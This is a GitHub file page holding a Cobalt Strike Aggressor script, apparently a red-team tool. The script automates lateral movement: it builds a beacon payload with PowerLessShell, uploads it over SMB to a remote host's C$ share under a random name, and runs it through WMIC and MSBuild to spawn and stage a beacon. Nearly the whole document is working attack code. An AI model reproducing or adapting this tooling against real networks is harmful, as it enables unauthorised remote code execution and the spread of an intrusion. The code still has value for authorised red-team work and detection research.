forked from Mr-Un1k0d3r/PowerLessShell
-
Notifications
You must be signed in to change notification settings - Fork 3
/
wmi_msbuild.cna
106 lines (95 loc) · 3.66 KB
/
wmi_msbuild.cna
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
# # # Aggressor script to simplify using PowerLessShell with Cobalt Strike (https://github.com/Mr-Un1k0d3r/PowerLessShell) # Author: MrT-F
# To use: load script. use macro "wmi_msbuild [target] [listener]" in beacon console
#
#
#Register alias
beacon_command_register("wmi_msbuild", "wmi lateral movement without powershell","Synopsis: wmi_msbuild [target] [listener]", "This uses Mr-Un1k0d3r's PowerLessShell (https://github.com/Mr-Un1k0d3r/PowerLessShell) to execute beacon's powershell payload on a remote system. You will need to copy the PowerLessShell repo to folder PowerLessShell in your cobaltstrike client directory (or edit the $pls_path variable here). Also, the PowerLessShell.py script assumes .NET framework 4.0.30319, so that must exist on the remote system. If it doesn't, edit the script ;)");
sub gen_random_name {
#returns random filename .TMP
local('@alphabet $len $i $filename');
@alphabet = @("a","b","c","d","e","f","g","h","i","j","k","l","m","n","o","p","q","r","s","t","u","v","w","x","y","z","A","B","C","D","E","F","G","H","I","J","K","L","M","N","O","P","Q","R","S","T","U","V","W","X","Y","Z");
#Random filename length between 5 and 16
$len = rand(11) + 5;
for($i = 0; $i < $len; $i++){
$filename .= rand(@alphabet);
}
$filename .= ".TMP";
return $filename;
}
sub gen_payload {
local('$ps1 $pls_path $handle');
$ps1 = artifact($1, "powershell", true, "x86");
#Change this to the path of PowerLessShell (relative to cobaltstrike dir, or just absolute)
$pls_path = "PowerLessShell";
chdir($pls_path);
if (checkError($error))
{
warn($error);
}
$handle = openf(">payload.ps1");
writeb($handle, $ps1);
if (checkError($error))
{
warn($error);
}
closef($handle);
}
sub gen_cs {
local('$handle');
$handle = exec("python PowerLessShell.py", $null, cwd());
if (checkError($error))
{
warn($error);
}
#stdin to name files
writeb($handle,"payload.ps1\n");
writeb($handle,"payload.cs\n");
#wait for generation to finish
wait($handle);
closef($handle);
}
sub wmi_msbuild_func {
local('$owd $ps1 $handle $payload $command_line $filename');
#save working dir to restore later
$owd = cwd();
#ensure listener exists
if (listener_info($3) is $null) {
berror($1, "Listener $3 does not exist");
return;
}
btask($1, "Tasked Beacon to spawn to $2 (" . listener_describe($3, $2) . ") via PowerLessShell");
#write payload to disk - i re-do this every time in case the listener changes. Probably could be more efficient
gen_payload($3);
#Use PowerLessShell.py to generate .CS files
gen_cs();
#payload.cs.cmd has some nice obfuscation, but we are just going to upload cs file via smb and execute it for now. There are length issues...
$handle = openf("payload.cs");
if (checkError($error))
{
warn($error);
}
$payload = readb($handle, -1);
if (checkError($error))
{
warn($error);
}
closef($handle);
$filename = gen_random_name();
bupload_raw($1,'\\\\'.$2.'\\C$\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\'.$filename,$payload);
#Built command line and execute - i spawn cmd rather than directly calling msbuild so we can delete the file when beacon exits (less sneaky, but less cleanup at end of engagement)
$command_line = 'wmic /node:"';
$command_line .= $2;
$command_line .= '" process call create "cmd /c cd C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319 && MSBuild.exe ';
$command_line .= $filename.' && del '.$filename.'"';
println($command_line);
#Run with beacon's "execute"
bexecute!($1, $command_line);
#in case of smb listener, this will link
bstage($1, $2, $3);
#restore working dir
chdir($owd);
}
#alias definition so we can just run this in console
alias wmi_msbuild {
wmi_msbuild_func($1, $2, $3);
}